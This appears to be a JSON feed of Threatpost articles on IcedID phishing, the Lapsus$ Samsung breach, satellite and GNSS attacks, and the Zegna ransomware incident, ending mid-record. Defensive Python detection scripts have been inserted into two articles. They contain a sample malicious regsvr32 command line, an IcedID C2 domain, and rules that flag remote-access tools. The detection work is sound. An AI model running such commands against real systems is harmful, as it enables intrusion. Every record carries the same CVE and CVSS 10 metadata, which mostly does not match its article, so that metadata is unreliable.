_Underwriters of Threatpost podcasts do not assert any editorial control over content._)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T14:00:57", "type": "threatpost", "title": "Ex-Gumshoe Nabs Cybercrooks with FBI Tactics", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T14:00:57", "id": "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "href": "https://threatpost.com/gumshoe-nabs-cybercrooks-fbi-tactics/178298/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T14:30:43", "description": "The ever-evolving [banking trojan IcedID](<https://threatpost.com/icedid-web-forms-google-urls/165347/>) is back again with a phishing campaign that uses previously compromised Microsoft Exchange servers to send emails that appear to come from legitimate accounts. 
Attackers also are using stealthy new payload-delivery tactics to spread the modular malware.\n\nResearchers from [Intezer](<https://www.intezer.com/>) earlier this month uncovered the campaign, which employs thread hijacking to send malicious messages from stolen Exchange accounts, lending the messages an extra layer of apparent legitimacy and helping them evade filtering, wrote researchers [Joakim Kennedy](<https://www.intezer.com/author/jkennedy/>) and [Ryan Robinson](<https://www.intezer.com/author/ryanrobinson/>) [in a blog post](<https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/>) published Monday.\n\nThe actors behind IcedID \u2013 as well as other spearphishers \u2013 have previously used phishing emails that \u201creuse previously stolen emails to make the lure more convincing,\u201d researchers wrote. However, this time the threat has evolved in a couple of key ways that make it even more dangerous to targets, which include organizations within the energy, healthcare, law and pharmaceutical sectors, researchers noted.\n\nNot only is the threat actor now sending the phishing emails through compromised Microsoft Exchange servers, from the very accounts it stole, but the malicious payload is also delivered in a way that executes the malware without the warning the user would otherwise see, researchers said.\n\n\u201cThe payload has also moved away from using office documents to the use of ISO files with a Windows LNK file and a DLL file,\u201d researchers wrote. \u201cThe use of ISO files allows the threat actor to bypass the [Mark-of-the-Web](<https://attack.mitre.org/techniques/T1553/005/>) controls, resulting in execution of the malware without warning to the user.\u201d\n\nThe downloaded ISO itself carries the Mark-of-the-Web, but the files inside the mounted image do not inherit it, so the SmartScreen and Office warnings that a macro-laden document would trigger never fire.\n\nPreviously, the infection chain most commonly associated with IcedID phishing campaigns was an email with an attached password-protected ZIP archive that contains a macro-enabled Office document, which executes the IcedID installer.\n\n## **Breakdown of the Attack Chain**\n\nThe new campaign starts with a phishing email about an important document, with a password-protected ZIP archive attached and the password supplied in the email body.\n\nThe email seems extra convincing to users because it uses what\u2019s called \u201cthread hijacking,\u201d in which attackers use a portion of a previous thread from a legitimate email found in the inbox of the stolen account.\n\n\u201cBy using this approach, the email appears more legitimate and is transported through the normal channels which can also include security products,\u201d researchers wrote.\n\nThe majority of the originating Exchange servers that researchers observed in the campaign appear to be unpatched and publicly exposed, \u201cmaking the ProxyShell vector a good theory,\u201d they wrote. [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) is a chain of Exchange Server vulnerabilities, disclosed and patched last year, that together allow remote code execution (RCE) and that attackers have [hammered ever since](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) on servers that remain unpatched.\n\nOnce unzipped, the archive yields a single ISO file bearing the same name as the ZIP; its timestamp shows it was created shortly before the email was sent. 
That ISO file contains two files: a LNK file named \u201cdocument\u201d and a DLL file named \u201cmain,\u201d also prepared relatively recently and potentially used in previous phishing emails, researchers said.\n\nWhen a user double-clicks the LNK file, it uses \u201cregsvr32\u201d to execute the DLL file, proxying execution of the malicious code in main.dll through a signed Windows binary for defense evasion, they wrote in the post. The DLL file is a loader for the IcedID payload.\n\nThe loader locates the encrypted payload, which is stored in the resource section of the binary, by resolving the Windows API function it needs through API hashing: it hashes exported function names and compares each result with a hardcoded hash until it finds FindResourceA, which it then calls dynamically to fetch the encrypted payload, researchers wrote.\n\nThe final step in the attack chain is that the IcedID \u201cGZiploader\u201d payload is decoded, placed in memory and executed. GZiploader fingerprints the machine and sends a beacon to the command-and-control (C2) server \u2013 located at yourgroceries[.]top \u2013 with information about the infected host, which can then be used for further nefarious activity.\n\n## **Evolution of a Threat**\n\nResearchers at IBM first discovered IcedID [back in 2017](<https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/>) as a trojan targeting banks, payment card providers, mobile services providers, payroll, web mail and e-commerce sites.\n\nThe malware has [evolved over the years](<https://threatpost.com/botnet-operators-team-up-to-leverage-icedid-trickbot-trojans/132392/>) and already has a storied history of clever obfuscation. 
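The chain just described (an ISO dropped from a password-protected ZIP, a LNK that hands a DLL to regsvr32, then a beacon to the C2) is easiest to hunt for by correlating endpoint telemetry. The following is an added example written for this page, not code from Intezer or from the article: it runs over a few constructed, Sysmon-style records (the host names, paths, PIDs and the benign installer event are all invented; the only value taken from the report is the C2 domain) and flags regsvr32 loading a module from a mounted ISO or from outside trusted directories.

```python
"""Hunt for the ISO -> LNK -> regsvr32 -> DLL delivery chain in endpoint telemetry.

Added example for this page, not code from Intezer or the article. Hosts, paths,
PIDs and the benign installer record are constructed; the only value taken from
the report quoted above is the C2 domain.
"""
import re
from collections import defaultdict

# Constructed, Sysmon-style sample telemetry (not real campaign data).
SAMPLE_EVENTS = [
    {"ts": 1, "host": "ws01", "type": "iso_mount", "drive": "E:",
     "source": r"C:\Users\alice\Downloads\document.iso"},
    {"ts": 2, "host": "ws01", "type": "process", "pid": 4312,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\explorer.exe",               # user double-clicked the LNK
     "cmdline": r'"C:\Windows\System32\regsvr32.exe" E:\main.dll'},
    {"ts": 3, "host": "ws01", "type": "dns", "pid": 4312, "query": "yourgroceries.top"},
    # Benign: an installer registering a COM server from Program Files.
    {"ts": 4, "host": "ws02", "type": "process", "pid": 980,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
]

KNOWN_C2 = {"yourgroceries.top"}   # reported IcedID C2 (from the write-up above)
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def parse_regsvr32_target(cmdline):
    """Return the module regsvr32 was asked to load, or None.

    Skips the executable itself (first token) and the /s /u /n /i switches,
    and keeps quoted paths with spaces intact.
    """
    tokens = [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]
    for tok in tokens[1:]:
        if tok.startswith(("/", "-")):
            continue
        return tok
    return None


def analyze(events):
    """Correlate ISO mounts, regsvr32 launches and DNS lookups per host.

    Timing is ignored for brevity; a production rule would window the mount and
    the lookup around the process start.
    """
    mounted = defaultdict(set)       # host -> drive letters currently backed by an ISO
    dns_by_pid = defaultdict(set)    # (host, pid) -> names queried
    for ev in events:
        if ev["type"] == "iso_mount":
            mounted[ev["host"]].add(ev["drive"].lower())
        elif ev["type"] == "dns":
            dns_by_pid[(ev["host"], ev["pid"])].add(ev["query"].lower())

    alerts = []
    for ev in events:
        if ev["type"] != "process" or not ev["image"].lower().endswith("\\regsvr32.exe"):
            continue
        target = parse_regsvr32_target(ev["cmdline"])
        reasons = []
        if target:
            low = target.lower()
            if low[:2] in mounted[ev["host"]]:
                reasons.append("dll_on_mounted_iso")
            elif not low.startswith(TRUSTED_PREFIXES):
                reasons.append("dll_outside_trusted_dirs")
        if ev.get("parent_image", "").lower().endswith("\\explorer.exe"):
            reasons.append("launched_by_explorer")   # weak on its own: any double-click looks like this
        hits = dns_by_pid[(ev["host"], ev["pid"])] & KNOWN_C2
        if hits:
            reasons.append("known_c2_lookup:" + ",".join(sorted(hits)))
        # Alert only when the module comes from somewhere suspicious; parentage alone is too noisy.
        if any(r.startswith("dll_") for r in reasons):
            alerts.append({"host": ev["host"], "pid": ev["pid"], "module": target, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The alert requires the suspicious module source because explorer.exe as a parent is only a weak signal on its own; the C2 lookup and the explorer parentage are recorded as supporting reasons so an analyst sees the full chain in one record.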
For example, it [resurfaced](<https://threatpost.com/icedid-banker-adding-steganography-covid-19-theme/156718/>) during the [COVID-19 campaign](<https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware>) with new functionality that uses steganography \u2013 the practice of hiding code within images to stealthily infect victims \u2013 as well as other enhancements.\n\nThe new campaign is evidence of its [further evolution](<https://threatpost.com/spam-icedid-banking-trojan-variant/167250/>) and could signify that IcedID is indeed becoming, [as many fear](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), the new [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) \u2013 a modular threat that began as a trojan but steadily evolved into one of the most dangerous malware families ever seen.\n\n\u201cThis attack shows how much effort attackers put in all the time to evade detection and why defense in depth is necessary,\u201d observed Saumitra Das, CTO and co-founder at security firm Blue Hexagon, in an email to Threatpost.\n\nThis time and effort, in turn, shows a level of sophistication on the part of those behind IcedID in that they have thorough knowledge of contemporary email protections and are continuously adding new tactics as security also grows and evolves, he said.\n\n\u201cMany email security systems use reputation of senders to block malicious email without being able to assess the email itself,\u201d Das noted. \u201cHere, they used compromised Exchange servers to make it through.\u201d\n\nThe group\u2019s use of obfuscated file formats to deliver malware, as well as the final payload\u2019s delivery over the network, also demonstrates that the threat actors know how to evade signatures and sandboxes, he added.\n\n\u201cThese attacks often go much deeper than simply stealing data,\u201d concurred Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel, in an email to Threatpost. \u201cThe cybercriminals take the time to read through the mailboxes to understand the inter-organization relationships and operating procedures.\n\n\u201cTo protect themselves from similar attacks, it\u2019s critical that organizations ensure that they apply security patches promptly and thoroughly in their environment,\u201d he added. However, what is historically true for patching remains true now: that it\u2019s \u201ca task that\u2019s easier said than done,\u201d Clements acknowledged.\n\n\u201cIt really takes a cultural approach to cybersecurity to plan for failures in defenses like patch management,\u201d he said.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T14:02:41", "type": "threatpost", "title": "Exchange Servers Speared in IcedID Phishing Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-29T14:02:41", "id": "THREATPOST:8243943141B8F18343765DA77D33F46C", "href": "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T19:35:26", "description": "Just days after leaking data it claims to have exfiltrated from chipmaker NVIDIA, ransomware group Lapsus$ is claiming another international company among its victims \u2014 
this time releasing data purportedly stolen from Samsung Electronics.\n\nThe consumer electronics giant confirmed in a [media statement](<https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code>) on Monday that a \u201csecurity breach\u201d had occurred related to internal company data \u2014 but said that customer and employee data were not impacted.\n\nLapsus$ had earlier announced on its Telegram channel that it had [breached Samsung](<https://securityaffairs.co/wordpress/128712/cyber-crime/samsung-electronics-lapsus-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=samsung-electronics-lapsus-ransomware>) and offered a taste of what it had as proof, including biometric authentication information and source code from both Samsung and one of its suppliers, Qualcomm. That\u2019s according to Security Affairs, which also published a screen grab of the data leak.\n\n[Screen capture of the Telegram message with data](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07135942/lapsu-telegram-annoucement-screen-grab.jpg>) (Source: Security Affairs)\n\n\u201cIf Samsung\u2019s keys were leaked, it could compromise the TrustZone environment on Samsung devices that stores especially sensitive data, like biometrics, some passwords and other details,\u201d said Casey Bisson, head of product and developer relations at BluBracket, via email. \u201cThe TrustZone environment is useful because it creates a strong security barrier to attacks by Android malware.\u201d\n\nHe added that if the leaked data allows malware to access the TrustZone environment, it could make all data stored there vulnerable.\n\n\u201cIf Samsung has lost control of the signing keys, it could make it impossible for Samsung to securely update phones to prevent attacks on the TrustZone environment,\u201d he said. \u201cCompromised keys would make this a more significant attack [than NVIDIA](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), given the number of devices, their connection to consumers, and amount of very sensitive data that phones have.\u201d\n\n## **Ransomware Is Here to Stay **\n\nObviously, the implications of source code and thousands of employee credentials out in the open are serious. The [ransomware attacks](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>) on Samsung and NVIDIA, and even January\u2019s Lapsus$ attack on media outlets in Portugal, SIC Noticias and Expresso, should serve as a grim reminder that the [ransomware](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) business is booming, according to experts.\n\n> The websites of two of the main media organizations in Portugal [@expresso](<https://twitter.com/expresso?ref_src=twsrc%5Etfw>) and [@SICNoticias](<https://twitter.com/SICNoticias?ref_src=twsrc%5Etfw>) are down, after an apparent hacking, according to their parent company, Impresa. [pic.twitter.com/la2Pi9JRgG](<https://t.co/la2Pi9JRgG>)\n> \n> \u2014 Mia Alberti (@mialberti) [January 2, 2022](<https://twitter.com/mialberti/status/1477622312098840581?ref_src=twsrc%5Etfw>)\n\n\u201cRansomware is not going away,\u201d Dave Pasirstein, CPO and head of engineering for TruU, told Threatpost by email. \u201cIt\u2019s a lucrative business that is nearly impossible to protect all risk vectors; however, it is made easy by enterprises failing to take enough precautionary steps.\u201d\n\n## **Ransomware Risk Vectors Abound **\n\nThose steps, according to Pasirstein, must include a zero-trust approach, an effective patching strategy, endpoint and email protection, employee training and strong authentication such as modern MFA. 
He added, \u201cideally, a password-less MFA that is not based on shared secrets and thus, cannot easily be bypassed by a server compromise.\u201d\n\nThe group\u2019s recent successes also highlight the need to protect data across the organization, Purandar Das, CEO of Sotero, told Threatpost.\n\n\u201cObviously a very concerning development for Samsung and NVIDIA if true,\u201d he said. \u201cWhat this also demonstrates is the vulnerability of data in any data store within organizations.\u201d\n\nHe explained that a common security approach is to focus on locking down structured data storage, which can be shortsighted.\n\n\u201cMost security has been focused on structured datastores with the assumption that the attackers are looking for confidential information that relates to individuals whether they are customers, consumers or employees,\u201d Das added. \u201cHowever, confidential or sensitive data is spread in more than just structured data stores.\u201d\n\nIn the case of Samsung, beyond releasing the company\u2019s competitive secrets, the Lapsus$ breach leaves the company open to future compromise, he warned.\n\n\u201cIn the case of Samsung, it would provide a pathway into any or many Samsung devices rendering them vulnerable in ways that wouldn\u2019t have been feasible,\u201d Das said. \u201cSecurity, or more importantly data-focused security, is essential. Securing the data is probably more critical or just as critical as today\u2019s security of attempting to lock down the perimeter.\u201d\n\n**_Register Today for [Log4j Exploit: Lessons Learned and Risk Reduction Best Practices](<https://bit.ly/3BXPL6S>) \u2013 a LIVE Threatpost event scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code expert Justin Young as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T19:28:36", "type": "threatpost", "title": "Samsung Confirms Lapsus$ Ransomware Hit, Source Code Leak", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T19:28:36", "id": "THREATPOST:14D52B358840B9265FED987287C1E26E", "href": "https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T20:14:45", "description": "In a warning to aviation authorities and air operators on Thursday, the European Union Aviation Safety Agency (EASA) warned of satellite jamming and spoofing attacks across a broad swath of Eastern Europe that could affect air navigation systems.\n\nThe warning came in tandem with a separate alert from the FBI and the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) that hackers could be targeting satellite communications networks in general.\n\n## **Quit Jammin\u2019 Me**\n\nThe navigation-jamming attacks affecting airplanes started Feb. 24, the first day of the Russian invasion of Ukraine, EASA said \u2013 and they\u2019ve continued to proliferate. So far, the affected areas include the Black Sea airspace, Eastern Finland, the Kaliningrad region and other Baltic areas, and the Eastern Mediterranean area near Cyprus, Turkey, Lebanon, Syria and Israel, as well as Northern Iraq.\n\n\u201cThe effects of [Global Navigation Satellite Systems (GNSS)] jamming and/or possible spoofing were observed by aircraft in various phases of their flights, in certain cases leading to re-routing or even to change the destination due to the inability to perform a safe landing procedure,\u201d EASA warned (PDF). \u201cUnder the present conditions, it is not possible to predict GNSS outages and their effects.\u201d\n\nLosing a GNSS signal could result in many negative outcomes, including pilots \u201cflying blind,\u201d without the use of waypoint navigation to tell where they are. 
Outages could also affect the ability for an airplane\u2019s instrumentation to accurately track the aircraft\u2019s position, which could lead to a plane entering contested airspace; the inability to properly gauge one\u2019s proximity to the ground (which could trigger pull-up commands, according to the alert); or the failure of systems that address dangers like wind shear.\n\n\u201cThe magnitude of the issues generated by such outage would depend upon the extent of the area concerned, on the duration and on the phase of flight of the affected aircraft,\u201d EASA warned.\n\nThe agency urged air operators to make sure that fall-back conventional navigation infrastructure is fully operational onboard the aircraft, and to ensure reliable surveillance coverage that is resilient to GNSS interference, such as ground-based navigational aids (i.e., Distance Measuring Equipment or DME, and Very High Frequency omnidirectional range or VOR).\n\n\u201cVerify the aircraft position by means of conventional navigation aids when flights are operated in proximity of the affected areas; check that the navigation aids critical to the operation for the intended route and approach are available; and remain prepared to revert to a conventional arrival procedure where appropriate and inform air traffic controllers in such a case,\u201d EASA recommended. \u201cEnsure, in the flight planning and execution phase, the availability of alternative conventional arrival and approach procedures (i.e. an aerodrome in the affected area with only GNSS approach procedure should not be considered as destination or alternate).\u201d\n\n## **CISA Warns on Satellite Network Hacking**\n\nThe concerns over the hacking of satellite systems in general also began Feb. 24, when Ukrainian officials reported that hackers had apparently compromised one of the nation\u2019s satellite systems. 
According [to Reuters](<https://www.reuters.com/world/europe/exclusive-us-spy-agency-probes-sabotage-satellite-internet-during-russian-2022-03-11/>), the attack made communication with the Viasat KA-SAT satellite impossible, which resulted in internet outages across Europe, with tens of thousands of people cut off.\n\nThe cyberattackers took advantage of a misconfigured management interface for the satellite network, Viasat said.\n\nThe National Security Agency is looking into whether the attack was carried out by Russian state-sponsored actors, according to the report.\n\nThis week, CISA [tersely warned](<https://www.cisa.gov/uscert/ncas/alerts/aa22-076a>) that it is \u201caware of possible threats to U.S. and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers\u2019 customer environments.\u201d\n\nThe agency advised satellite operators to start monitoring at ingress and egress points for anomalous traffic, including the use of various remote access tools (Telnet, FTP, SSH and so on); connections out to \u201cunexpected\u201d network segments; unauthorized use of local or backup accounts; unexpected traffic to terminals or closed-group SATCOM networks; and brute-force login attempts.\n\nSatellite customers meanwhile should implement multifactor authentication (MFA) on their accounts, CISA warned, and should shore up least-privilege approaches for any sensitive areas served by satellite links.\n\nAndreas Galauner, lead security researcher at Rapid7, noted that in the U.S., critical infrastructure is likely the target for such attacks.\n\n\u201cAlmost no private individual uses SATCOM, as it is costly and the latency is too high and slow,\u201d he said via email. 
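The CISA monitoring list above translates directly into a handful of rules. The following is an added example written for this page, not CISA's, Viasat's or any vendor's tooling: it runs over constructed flow and authentication records (the address ranges, account names, thresholds and every log line are assumptions) and reports remote-access protocols crossing the network boundary, connections into internal segments nobody expects, brute-force login bursts and successful use of local or backup accounts.

```python
"""Rules derived from the CISA SATCOM monitoring advice, run over constructed logs.

Added example for this page; not CISA's, Viasat's or any vendor's tooling.
Address ranges, account names, thresholds and every record below are assumptions.
"""
import ipaddress
from collections import defaultdict, deque

# Assumed addressing: one corporate range, and two segments expected to talk to each other.
CORPORATE_NET = ipaddress.ip_network("10.0.0.0/8")
TERMINAL_NET = ipaddress.ip_network("10.50.0.0/16")   # SATCOM terminals
MGMT_NET = ipaddress.ip_network("10.10.0.0/24")       # NOC / management hosts
EXPECTED_SEGMENTS = (TERMINAL_NET, MGMT_NET)

REMOTE_ACCESS_PORTS = {21: "ftp", 22: "ssh", 23: "telnet", 3389: "rdp"}
LOCAL_OR_BACKUP_ACCOUNTS = {"backupadmin", "svc_recovery"}   # assumed account names
BRUTE_FORCE_THRESHOLD = 5   # failed logins ...
BRUTE_FORCE_WINDOW = 60     # ... within this many seconds from one source

# Constructed sample records (timestamps in seconds).
FLOWS = [
    {"ts": 100, "src": "10.50.3.7", "dst": "10.10.0.5", "dport": 22},    # terminal -> mgmt SSH: expected
    {"ts": 101, "src": "10.10.0.5", "dst": "198.51.100.9", "dport": 23},  # mgmt -> internet telnet
    {"ts": 102, "src": "203.0.113.40", "dst": "10.50.3.7", "dport": 23},  # internet -> terminal telnet
    {"ts": 103, "src": "10.10.0.5", "dst": "10.99.7.2", "dport": 445},    # mgmt -> segment nobody expects
    {"ts": 104, "src": "10.50.3.7", "dst": "10.50.3.8", "dport": 443},    # terminal -> terminal HTTPS: fine
]
AUTH = [{"ts": 200 + i, "src": "203.0.113.40", "user": "admin", "ok": False} for i in range(6)] + [
    {"ts": 300, "src": "10.10.0.5", "user": "noc_operator", "ok": True},
    {"ts": 301, "src": "203.0.113.40", "user": "backupadmin", "ok": True},
]


def segment_of(ip):
    """Name of the expected segment an address belongs to, or None."""
    addr = ipaddress.ip_address(ip)
    for net in EXPECTED_SEGMENTS:
        if addr in net:
            return str(net)
    return None


def check_flows(flows):
    """Flag remote-access protocols crossing the boundary and traffic into unexpected internal segments."""
    findings = []
    for f in flows:
        src_seg, dst_seg = segment_of(f["src"]), segment_of(f["dst"])
        proto = REMOTE_ACCESS_PORTS.get(f["dport"])
        if proto and (src_seg is None or dst_seg is None):
            findings.append(("remote_access_boundary", proto, f))
        elif dst_seg is None and ipaddress.ip_address(f["dst"]) in CORPORATE_NET:
            findings.append(("unexpected_segment", f["dst"], f))
    return findings


def check_auth(records):
    """Flag brute-force bursts per source and any successful login to a local/backup account."""
    findings = []
    recent = defaultdict(deque)  # source -> timestamps of recent failures
    for r in sorted(records, key=lambda rec: rec["ts"]):
        if r["ok"]:
            if r["user"] in LOCAL_OR_BACKUP_ACCOUNTS:
                findings.append(("backup_account_login", r["user"], r))
            continue
        window = recent[r["src"]]
        window.append(r["ts"])
        while window[0] < r["ts"] - BRUTE_FORCE_WINDOW:
            window.popleft()
        if len(window) == BRUTE_FORCE_THRESHOLD:  # fire once, when the threshold is crossed
            findings.append(("brute_force", r["src"], r))
    return findings


def run(flows=FLOWS, auth=AUTH):
    """Evaluate both rule sets and return every finding as (kind, detail, record)."""
    return check_flows(flows) + check_auth(auth)


if __name__ == "__main__":
    for kind, detail, rec in run():
        print(f"{kind:24} {detail:16} {rec}")
```

The boundary rule deliberately treats any remote-access protocol touching an address outside the expected segments as reportable in both directions, since the CISA note covers ingress as well as egress; the unexpected-segment rule is limited to the assumed corporate range so that ordinary internet egress is not flooded into the findings.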
\u201cThis leaves industrial and critical infrastructures, which makes SATCOM an appealing target.\u201d\n\nJames McQuiggan, security awareness advocate at KnowBe4, made a similar assessment.\n\n\u201cCommunication is a critical element needed in life these days, whether between families or between governments,\u201d he emailed. \u201cIf the ability to communicate is lost, it becomes challenging to strategize, coordinate or plan. When cybercriminals are targeting this element of critical infrastructure, cyber-resiliency is essential to remain in contact. Organizations working with SATCOM products or services need to ensure protections to secure access to the devices with multi-factor authentication. Ensure all systems are up to date with software and firmware updates, increase monitoring of traffic and logs, and review incident response plans to prepare for an outage.\u201d\n\nISPs of all stripes should be vigilant, Galauner added.\n\n\u201cEven though this particular risk relates to satellite communication networks, this has happened before in \u2018normal\u2019 ISPs,\u201d he said. \u201cIn those instances, what got \u2018pwned\u2019 is the CPE: modems and routers that weren\u2019t configured properly by the ISP. This could happen on DSL and cable lines as much as it can happen here. However, a satellite network, possibly spanning huge geographical areas, might allow attackers to perform more widespread attacks without having to be in the physical vicinity.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T20:05:36", "type": "threatpost", "title": "Agencies Warn on Satellite Hacks & GPS Jamming Affecting Airplanes, Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T20:05:36", "id": "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "href": "https://threatpost.com/agencies-satellite-hacks-gps-jamming-airplanes-critical-infrastructure/178993/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T17:29:37", "description": "High-end Italian fashion house Ermenegildo Zegna revealed on Monday that it was the target of a ransomware attack 
last August \u2014 and that it managed to recover its systems from back-up without paying a ransom.\n\nThe Milan-based firm already [had revealed](<https://www.zegnagroup.com/en/news/27-important-security-update-from-the-ermenegildo-zegna-group/>) on Aug. 6, 2021, that it became aware of unauthorized access to its systems but did not disclose the specific type of breach.\n\nIn a [public filing](<https://docoh.com/filing/1877787/0001193125-22-100975/ZGN-424B3>) this week, however, the company acknowledged that it was a ransomware attack that \u201cimpacted the majority of our IT systems\u201d and ultimately led to some private accounting data stolen in the incident being leaked online.\n\nIndeed, the [RansomExx ransomware](<https://threatpost.com/ransomexx-ransomware-gang-dumps-stolen-embraer-data-report/161918/>) operation claimed responsibility for the August attack and published leaked data stolen from the company online the day Zegna first announced the incident, according to a [report published](<https://www.bleepingcomputer.com/news/security/luxury-fashion-house-zegna-confirms-august-ransomware-attack/>) by Bleeping Computer.\n\n\u201cAs we refused to engage in discussions relating to the payment of the ransom, the responsible parties published certain accounting materials extracted from our 